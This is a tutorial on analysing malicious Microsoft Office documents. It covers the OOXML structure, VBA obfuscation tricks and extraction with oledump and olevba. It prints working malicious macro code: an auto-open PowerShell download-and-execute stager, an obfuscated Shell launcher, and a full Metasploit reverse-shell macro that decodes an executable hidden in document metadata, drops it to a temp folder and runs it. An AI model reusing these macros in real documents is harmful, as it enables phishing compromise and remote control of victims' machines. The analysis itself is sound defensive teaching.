Analyzing Malware Documents

Being able to embed code in a file allows certain tasks to be carried out when handling documents, whether to enhance the content or to process data within the document. However, malicious actors have abused this feature for a long time, and little can be done to mitigate this attack vector without removing the functionality from the document.

Microsoft has included the ability to embed Visual Basic for Applications code within Office documents since 1993, with the first version being implemented in Excel. This allows users to record actions to automate working with documents.

Visual Basic for Applications, or VBA, is based on Visual Basic 6, Microsoft's event-driven programming language that was discontinued in 2008. However, the language lives on in VBA, which facilitates automating tasks within Office documents, and also in VBScript.

Office Document Structure

In the early 2000s, Microsoft began moving from a single binary file with a closed standard to an open standard that uses XML files to make up the document. The new format became the default in Office 2007.

Officially called Office Open XML and distinguished by an x at the end of the extension, the file is a zip archive made up mainly of XML files. Any other files that are inserted into the document are also included within the zip archive.
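The difference between the two containers can be checked from the first bytes of a file. The following is a minimal Python sketch, not part of the original write-up: the function name container_type is hypothetical, the legacy header value is the well-known compound file signature, and the presence of [Content_Types].xml is used only as a rough hint that a zip archive is an Office Open XML package.

```python
import io
import zipfile

# Signature found at the start of legacy binary Office files (compound file format)
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def container_type(data: bytes) -> str:
    """Roughly classify raw file bytes as 'ole-binary', 'ooxml', 'zip' or 'unknown'."""
    if data.startswith(OLE_MAGIC):
        return "ole-binary"
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            # Heuristic only: Office Open XML packages carry this part at the root
            if "[Content_Types].xml" in archive.namelist():
                return "ooxml"
        return "zip"
    return "unknown"
```

A file whose extension says .docx but whose content is classified as ole-binary would deserve a closer look, since the extension alone can be changed freely.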

Within the zip archive, some files exist regardless of the type of document; these are the Metadata files. Other files depend on the type of document; these are the Document files, and they are stored in a directory named after the document type.

The contents of the archive may differ depending on the program that created the file.

Metadata Files

There are 3 files that are used for this section

Document Properties

Located in the docProps directory, these are two XML files (core.xml and app.xml in the sample analyzed later) that contain the properties of the document.

Main Document Contents

The document contents are included in this directory, and the directory name depends on the program that creates the file (for example, word for a Word document).

The contents of this directory will vary between the format types, however, they mainly include any styling data and the distribution of the document contents.

Macros may also be included within this directory or they may exist in a separate Macros directory.


A separate media directory includes any media, such as images, that are inserted into the document.

Malware in Macros

Malware is often embedded within Office documents, which use enticing names and messages to get users to open them and ignore any alerts.

Early versions of Office would automatically execute any macros that were included, which made things easier for malicious actors, as they only needed the victim to open the file. Because of this, Microsoft changed the way macros work: starting the execution of a macro now requires user intervention, and the user is alerted to the risk of running macros in unknown files.

Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents without always considering employee education or signing the documents to avoid alerts. As a result, users are conditioned to ignore the alerts, which makes things easier for malicious actors.

There are multiple ways that macros can be abused to attack the victim's system. In some cases the malware is within the macro code itself; in others, the macro carries an encoded binary file that is decoded, saved to disk, and executed.

More recent cases use the Office document as a first stage, where PowerShell code is leveraged to download a second stage that contains the actual malware. Because of the detection mechanisms in current security tools, malicious actors need to encode payloads and commands using different methods, which include simple encoding algorithms such as Base64, reversing strings, and obfuscating strings within the code.

A simple example of a first stage using macros is shown in "How to create Microsoft Office macro malware – phishing attack":

Sub Auto_Open()
  Dim exec As String
  exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring(''))"""
  Shell (exec)
End Sub

In this example, the attack is simple and not obfuscated: the code downloads a file from a web server and executes it using PowerShell. The downloaded PowerShell script could act as a second stage or establish a reverse shell, among other possibilities.

During an investigation, it is necessary to retrieve any additional files that the macro downloads in order to build the complete picture and look for indicators of compromise. These can be used to find other systems that may have been infected, or to establish monitoring rules that look out for new victims.

Parts of the malware can be placed within the metadata of the document. This serves as an easy hiding spot, and the payload can be quickly changed without having to alter the code.
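As a starting point for collecting indicators of compromise, network indicators can be pulled out of macro or script text with regular expressions. This is a rough Python sketch under simple assumptions: the function name extract_iocs and both patterns are illustrative, and they only catch plain http/https URLs and dotted IPv4 addresses that are not obfuscated.

```python
import re

# Plain http/https URLs, stopping at quotes, brackets or whitespace
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Candidate dotted-quad IPv4 addresses (validated further below)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(text: str) -> dict:
    """Return de-duplicated URLs and IPv4 addresses found in the text."""
    urls = sorted(set(URL_RE.findall(text)))
    ips = sorted(
        {
            candidate
            for candidate in IPV4_RE.findall(text)
            if all(int(part) <= 255 for part in candidate.split("."))
        }
    )
    return {"urls": urls, "ipv4": ips}
```

The same function can be run again on each decoded layer or downloaded stage, since indicators are often only visible after decoding.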

Entry Point

For macro code, several functions can act as the entry point for execution, depending on the intention or obfuscation method that the malicious actor chooses. It is common for security applications to open email attachments for quick analysis. To avoid the malware being triggered as soon as the document is opened, the malicious actor can use a different function that triggers execution at a different point or under certain conditions.

Below is a sample of obfuscated code that serves as the entry point for the malware, in this case the function DecodeDocument.

Attribute VB_Name = "NewMacros"                                                   
Sub DecodeDocument()                                                                                                                                                 
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
' DecodeDocument Macro        
    Dim d3h5dHh5U3BwaWxX
    ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
    a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")                                
    d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
    eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)                                 
    d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)                                
End Sub                                                                           
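The property name passed to BuiltInDocumentProperties is hidden as a chain of Chr() calls. Such chains can be resolved statically, without running the macro. The Python sketch below is one possible way to do it: the function name resolve_chr_chains is hypothetical, and it only handles literal numeric arguments joined with + or &.

```python
import re

# One or more Chr(<number>) calls joined by + or &
CHR_CHAIN = re.compile(r"(?:\bChr\(\d+\)\s*[+&]\s*)*\bChr\(\d+\)", re.IGNORECASE)


def resolve_chr_chains(vba_source: str) -> str:
    """Replace each Chr(...) chain with the string literal it builds."""

    def to_literal(match):
        codes = re.findall(r"Chr\((\d+)\)", match.group(0), re.IGNORECASE)
        text = "".join(chr(int(code)) for code in codes)
        # Double any embedded quotes, as VBA string literals require
        return '"' + text.replace('"', '""') + '"'

    return CHR_CHAIN.sub(to_literal, vba_source)


line = ("ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + "
        "Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))")
print(resolve_chr_chains(line))
```

For the line taken from the sample, the chain resolves to the string Comments, which shows that the macro reads its data from the Comments property of the document.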

Base64 Decode Function

VBA does not include a built-in function or library that can quickly encode or decode Base64. However, this can be easily implemented using other components available to Office, such as MSXML, as shown in the following code.

Private Function EncodeBase64(ByRef arrData() As Byte) As String

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    ' byte array to base64
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text


    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Private Function DecodeBase64(ByVal strData As String) As Byte()

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Malicious actors sometimes create their own implementation of certain functionality within the malware. This can be done for various reasons: there may be no simpler way to do it within the language, or it may serve to obfuscate the code. It is also common for only decoders to be included in the macro, especially when the macro code doesn't need to encode any data.

Below is an obfuscated Base64 decoder found in a malware sample.

Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
    Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc

    CBnhtvROBWJf = 2      
    VAIXQ = bGVuZ3RoCg(GYDozL)
    VdNmpUUu = 8
    uOatMJ = 16 * 4

    For cWBqjCKwBl = 1 To VAIXQ Step 4
        Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR

        zIlis = 3
        EgnwkcNgcIgofn = 0

        For OaRRODd = 0 To 3
            WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)

            If WuFeJHdca = "=" Then
                zIlis = zIlis - 1
                MmrJRSmq = 0
            Else
                MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
            End If

            EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
        Next

        EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
        EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn

        dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))

        vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
    Next

    QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function

The function accepts two parameters: the Base64-encoded string (GYDozL) and the alphabet that is used to look up the value of each character (xbZuLutP).

There are also variables that are used as decoys, meaning that their values are never used after being assigned. The same can be done with functions: multiple functions can be created but never called, or functions can be called but their output never used.

Encoding is not used with security in mind. It is used to make commands harder to detect, to handle character-encoding conversions, or to avoid parts of the code being lost when data is transferred over the Internet.
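With the decoy variables stripped out, the logic of the decoder is short. The following Python sketch mirrors the VBA step by step so that encoded strings can be decoded outside of Office. The names decode_with_alphabet and STANDARD_ALPHABET are hypothetical, and the sketch assumes the input length is a multiple of 4 and that every character is present in the supplied alphabet.

```python
STANDARD_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)


def decode_with_alphabet(encoded: str, alphabet: str) -> bytes:
    """Decode Base64 text using a caller-supplied 64-character alphabet."""
    output = bytearray()
    for start in range(0, len(encoded), 4):
        data_bytes = 3  # each group of 4 characters yields up to 3 bytes
        group_value = 0
        for char in encoded[start:start + 4]:
            if char == "=":
                data_bytes -= 1  # padding: one fewer output byte
                digit = 0
            else:
                digit = alphabet.index(char)  # position in the alphabet = 6-bit value
            group_value = 64 * group_value + digit
        output += group_value.to_bytes(3, "big")[:data_bytes]
    return bytes(output)
```

Because the alphabet is a parameter, the same function works whether the sample uses the standard alphabet or a shuffled one.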

For this next sample code, each character is shifted by 4 positions, in the style of ROT13 (the decoder subtracts 4 from each byte value), and then the whole string is reversed.

Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
    Dim b As String, i As Long, a() As Byte, sh
    a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
    For i = 0 To UBound(a)
        a(i) = a(i) - 4
    Next i
    b = StrReverse(StrConv(a, vbUnicode))
    aWhzZ2lI = b
End Function

There is only one input parameter, which is the string that is encoded.
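The same transformation can be reproduced outside of Office to recover the strings without executing the macro. This is a small Python sketch of the decoder: the function name shift_reverse_decode is hypothetical, and it assumes single-byte characters (Latin-1), whereas the VBA version depends on the system code page.

```python
def shift_reverse_decode(encoded: str, shift: int = 4) -> str:
    """Subtract `shift` from every byte, then reverse the whole string."""
    # Modulo keeps values in byte range; the VBA original would raise an
    # overflow error instead for bytes smaller than the shift.
    shifted = bytes((value - shift) % 256 for value in encoded.encode("latin-1"))
    return shifted.decode("latin-1")[::-1]


# String literal taken from the DecodeDocument entry point of the sample
ENCODED = r"3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE"
print(shift_reverse_decode(ENCODED))
```

Applied to the string literal from the entry point, the result is the standard Base64 alphabet, which is the second argument that the sample passes to its Base64 decoder.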

One way to analyze a function is to look at the parameters it is called with and the output it returns. It is still important to look for any calls that may execute commands outside of the code or Office document.

Renaming Functions

Given that VBA doesn't offer a way to rename functions, as languages like JavaScript do, a workaround is to create a function that simply returns the value that the other function returns.

In this example, to obfuscate the function Len, a function is created with a random string of characters.

Function bGVuZ3RoCg(c3RyaW5nCg)
    bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function
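The seemingly random identifiers in this sample are worth a second look, because several of them decode as Base64 text that hints at the purpose of the function. The Python sketch below is an analysis aid rather than anything present in the sample: the function name decode_identifier is hypothetical, and missing padding is restored before decoding.

```python
import base64


def decode_identifier(name: str) -> str:
    """Try to read an identifier as unpadded Base64 text."""
    padded = name + "=" * (-len(name) % 4)  # restore stripped '=' padding
    return base64.b64decode(padded).decode("ascii", errors="replace")


for identifier in ("bGVuZ3RoCg", "c3RyaW5nCg", "QmFzZTY0X0RlY29kZQo", "aWhzZ2lI"):
    print(identifier, "->", repr(decode_identifier(identifier)))
```

The first three names decode to length, string and Base64_Decode, each followed by a newline. The last one decodes to ihsgiH, which becomes Decode once the shift-by-4 and reverse transformation used elsewhere in the sample is undone.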

Document Analysis

This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m, though this can be changed.

The first step is to check the contents of the archive. The 7-Zip utility can be used for this task:

❯ 7z l Doc5.docm

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)

Listing archive: Doc5.docm

Path = Doc5.docm
Type = zip
Physical Size = 26568

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00 .....         1585          413  [Content_Types].xml
1980-01-01 00:00:00 .....          590          239  _rels/.rels
1980-01-01 00:00:00 .....         4526         1557  word/document.xml
1980-01-01 00:00:00 .....         1081          301  word/_rels/document.xml.rels
1980-01-01 00:00:00 .....        27648        10834  word/vbaProject.bin
1980-01-01 00:00:00 .....         8393         1746  word/theme/theme1.xml
1980-01-01 00:00:00 .....          277          191  word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 .....         2474          609  word/vbaData.xml
1980-01-01 00:00:00 .....         3194         1105  word/settings.xml
1980-01-01 00:00:00 .....          241          155  customXml/item1.xml
1980-01-01 00:00:00 .....          341          225  customXml/itemProps1.xml
1980-01-01 00:00:00 .....        29364         2924  word/styles.xml
1980-01-01 00:00:00 .....          803          313  word/webSettings.xml
1980-01-01 00:00:00 .....         1567          502  word/fontTable.xml
1980-01-01 00:00:00 .....          991          572  docProps/core.xml
1980-01-01 00:00:00 .....         1041          524  docProps/app.xml
1980-01-01 00:00:00 .....          296          194  customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00              84412        22404  17 files

The presence of word/vbaProject.bin, together with its vbaProject.bin.rels relationship file, indicates that a macro is present within the document. This could be a red flag if there is no expectation of a macro being embedded within the document. Further analysis should be carried out to determine whether the code is malicious.
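The same check can be scripted when many documents need to be triaged. A minimal Python sketch using the standard zipfile module follows. The function name find_vba_parts is hypothetical, and the check relies only on the part name, so it is a first filter rather than proof that a macro exists or is malicious.

```python
import zipfile


def find_vba_parts(path_or_file) -> list:
    """Return archive members whose name ends in vbaProject.bin."""
    with zipfile.ZipFile(path_or_file) as archive:
        return [
            name
            for name in archive.namelist()
            if name.lower().endswith("vbaproject.bin")
        ]
```

For the sample listed above, calling find_vba_parts("Doc5.docm") would be expected to return the single entry word/vbaProject.bin.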

Extracting Macro Source Code

There are tools that are able to extract source code from the document, such as oledump. This tool can be used to analyze the document.

❯ oledump Doc5.docm
A: word/vbaProject.bin
 A1:       412 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    7836 'VBA/NewMacros'
 A4: m    1135 'VBA/ThisDocument'
 A5:      5028 'VBA/_VBA_PROJECT'
 A6:      3195 'VBA/__SRP_0'
 A7:       340 'VBA/__SRP_1'
 A8:      3399 'VBA/__SRP_2'
 A9:       366 'VBA/__SRP_3'
A10:       348 'VBA/__SRP_4'
A11:       106 'VBA/__SRP_5'
A12:       571 'VBA/dir'

The output above shows multiple objects that are identified by the A code at the start of the line and can be easily extracted with the following command

oledump Doc5.docm -v -s A3

This outputs the object A3, which is the source code of the macro contained within the document. Objects that contain macro code are marked with a capital M in the first output.

Not all macros execute upon loading the document in an Office program; this can be done to avoid automatic analysis with sandbox tools. Documents that do execute code upon opening use the autoopen function, as in the following example:

Sub autoopen()
  MsgBox ("hello world")
End Sub

After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for places where the code carries out potentially dangerous commands, and check whether they can be safely replaced so that they output to a message box or terminal instead of executing other commands.

Tool olevba

Another tool to extract the source code is olevba. Below is the sample document being analyzed with this tool:

❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 -
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|Type      |Keyword             |Description                                  |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|vbHide              |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|StrReverse          |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |

An advantage of this tool is that it flags keywords that are often used in malicious macro code. This can be an initial step in determining whether the macro might be malicious, and a starting point for what to check.
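The idea behind this kind of keyword table can be approximated in a few lines when only the extracted source is at hand. The Python sketch below is not olevba's implementation: the function name triage_keywords is hypothetical, and the keyword list contains only the four entries from the output above, with their descriptions copied from it.

```python
import re

# Keywords and descriptions taken from the olevba output shown above
SUSPICIOUS_KEYWORDS = {
    "Shell": "May run an executable file or a system command",
    "vbHide": "May run an executable file or a system command",
    "Chr": "May attempt to obfuscate specific strings",
    "StrReverse": "May attempt to obfuscate specific strings",
}


def triage_keywords(vba_source: str) -> dict:
    """Return the suspicious keywords that occur as whole words in the source."""
    hits = {}
    for keyword, description in SUSPICIOUS_KEYWORDS.items():
        # VBA is case-insensitive, so the search is too
        if re.search(rf"\b{re.escape(keyword)}\b", vba_source, re.IGNORECASE):
            hits[keyword] = description
    return hits
```

A match only says that the keyword appears in the code. Legitimate macros use these functions as well, so the result is a list of places to read first, not a verdict.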

Extracting Metadata

In newer Office documents, the metadata is stored in a file called core.xml, which can be viewed with the xmllint command:

xmllint --format core.xml

The output is formatted and can be easily read

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="" xmlns:dc="" xmlns:dcterms="" xmlns:dcmitype="" xmlns:xsi="">
  <dc:creator>Document Author</dc:creator>
  <cp:lastModifiedBy>Document Author</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-16T00:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T00:55:00Z</dcterms:modified>

There are a couple of encoded strings visible, and the macro makes reference to the metadata. Having encoded strings in the metadata can also be a red flag, as they often contain other data that the macro needs, such as URLs or IP addresses from which to download another stage. Decoding them can provide more details, though it is possible that multiple encodings are used.
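Metadata values that look encoded can also be picked out programmatically. The Python sketch below parses the bytes of a core.xml file and lists the properties whose value is long and made up only of Base64 characters. The function names and the 40-character threshold are assumptions made for illustration, and namespace prefixes are discarded so that only the local property name is kept.

```python
import re
import xml.etree.ElementTree as ET

BASE64_CHARS = re.compile(r"[A-Za-z0-9+/=\s]+")


def core_properties(xml_bytes: bytes) -> dict:
    """Map each property's local name (namespace removed) to its text value."""
    root = ET.fromstring(xml_bytes)
    return {
        element.tag.rsplit("}", 1)[-1]: (element.text or "").strip()
        for element in root
    }


def encoded_looking(properties: dict, min_length: int = 40) -> list:
    """Names of properties whose value is long and uses only Base64 characters."""
    return [
        name
        for name, value in properties.items()
        if len(value) >= min_length and BASE64_CHARS.fullmatch(value)
    ]
```

Any property reported by encoded_looking is a candidate for decoding, keeping in mind that a prefix may need to be skipped or that more than one encoding layer may be present.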

Metasploit Reverse Shell

This is a reverse shell macro that was created using Metasploit. It is a good beginner sample for practicing the analysis of malware documents, and this section walks through how to check the document.

First checking the file using oledump shows the following output

A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

The object to extract is A3, as it is marked with the letter M, which oledump uses to denote macro code. Its content is the following:

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub

' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller,
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  '1999 Antonin Foller, Motobit Software,
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function

In this instance the source code is not obfuscated, which makes it easier to analyze. There is a check for the operating system so that different commands are used on each, and a reference to the Comments property found in the metadata.

Checking the core.xml file shows a big block of data in the description field:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="" xmlns:dc="" xmlns:dcterms="" xmlns:dcmitype="" xmlns:xsi="">
  <cp:lastModifiedBy>Wei Chen</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>

The long string is encoded using Base64; decoding the data results in a binary file.
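The extraction that the macro performs can be repeated offline. The macro calls Mid(prop.Value, 56), which is 1-indexed and therefore drops the first 55 characters before decoding. The Python sketch below follows the same steps. The function names are hypothetical, and the check for the MZ signature is only a quick sanity test that the result starts like a Windows executable.

```python
import base64


def extract_payload(comments: str, start: int = 56) -> bytes:
    """Decode the Base64 payload that begins at 1-indexed position `start`."""
    encoded = comments[start - 1:]       # Mid(value, 56) keeps character 56 onward
    encoded = "".join(encoded.split())   # drop line breaks, tabs and spaces
    return base64.b64decode(encoded)


def looks_like_pe(data: bytes) -> bool:
    """True when the data starts with the MZ signature of Windows executables."""
    return data[:2] == b"MZ"
```

The decoded bytes can then be written to a file, such as the msf.dat file examined next, and inspected with a binary analysis tool instead of being executed.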

Checking the Windows executable with Radare2 shows the following

❯ r2 msf.dat
[0x00407354]> i
fd       3
file     msf.dat
size     0x1204a
humansz  72.1K
mode     r-x
format   pe
iorw     false
blksz    0x0
block    0x100
type     EXEC (Executable file)
arch     x86
baddr    0x400000
binsz    73802
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto   false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian   little
havecode true
hdr.csum 0x00000000
guid     4AC180361
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  i386
maxopsz  16
minopsz  1
nx       false
os       windows
overlay  true
cc       cdecl
pcalign  0
pic      false
relocs   true
signed   false
sanitiz  false
static   false
stripped false
subsys   Windows GUI
va       true

The binary analysis of this file is out of the scope of this documentation; however, the executable establishes a reverse shell back to the attacker.